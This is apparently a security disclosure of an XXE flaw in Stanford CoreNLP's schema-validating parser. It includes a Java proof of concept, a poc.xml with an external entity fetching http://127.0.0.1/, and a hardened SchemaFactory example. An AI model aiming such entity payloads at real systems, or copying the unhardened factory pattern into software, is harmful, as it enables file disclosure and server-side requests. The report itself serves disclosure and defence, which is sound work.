When a malicious schema XML file is passed to getValidatingXmlParser(), the parser is vulnerable to XXE when the SchemaFactory parses the schema XML file.
public static DocumentBuilder getValidatingXmlParser(File schemaFile) {
    ...
    SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
    Schema schema = factory.newSchema(schemaFile);
The SchemaFactory is created without FEATURE_SECURE_PROCESSING set, so it resolves external entities while creating a new schema from schemaFile, leaving the call vulnerable to XXE.
By default, SchemaFactory is vulnerable to XXE, as shown by the example below:
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Schema;
import javax.xml.XMLConstants;
import java.io.File;

public class Poc {
    public static void main(String[] args) {
        try {
            // Default factory: no secure-processing feature, external entities are resolved.
            SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
            // The external entity declared in poc.xml is fetched while the schema file is parsed.
            Schema schema = factory.newSchema(new File("poc.xml"));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
poc.xml:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1/">]>
<foo>&xxe;</foo>
https://github.com/stanfordnlp/corenlp/compare/HEAD…haxatron:fix-xxe-2
Impact: any application that uses this function to validate XML documents against an attacker-controlled schema file is exposed to XXE through the schema parsing step.
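For comparison, the following is an added example of the hardened counterpart to the default SchemaFactory shown above; it is not the project's patch. It disables external DTD and external schema access via the standard JAXP XMLConstants properties (available since Java 7u40 / Java 8) and exercises the result against a constructed copy of poc.xml.

```java
import javax.xml.XMLConstants;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import java.io.File;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import org.xml.sax.SAXException;

public class HardenedSchemaLoader {

    // Build a SchemaFactory that refuses to fetch external DTDs/entities and
    // external schema references while reading an untrusted schema file.
    public static SchemaFactory hardenedSchemaFactory() throws SAXException {
        SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        // Turns on the JAXP secure-processing limits (entity expansion caps, etc.).
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Empty protocol list: no external DTD / external entity access ("file", "http", ...).
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        // Same for xs:import / xs:include of remote schema documents.
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return factory;
    }

    public static Schema loadSchema(File schemaFile) throws SAXException {
        return hardenedSchemaFactory().newSchema(schemaFile);
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: the same entity-bearing document as the report's poc.xml,
        // written to a temp file so the example runs stand-alone.
        String poc = "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]>\n"
            + "<foo>&xxe;</foo>\n";
        File tmp = File.createTempFile("poc", ".xml");
        tmp.deleteOnExit();
        Files.write(tmp.toPath(), poc.getBytes(StandardCharsets.UTF_8));
        try {
            loadSchema(tmp);
            System.out.println("schema accepted");
        } catch (SAXException e) {
            // With external access disabled, the parser rejects the external entity
            // reference instead of fetching it.
            System.out.println("schema rejected: " + e.getMessage());
        }
    }
}
```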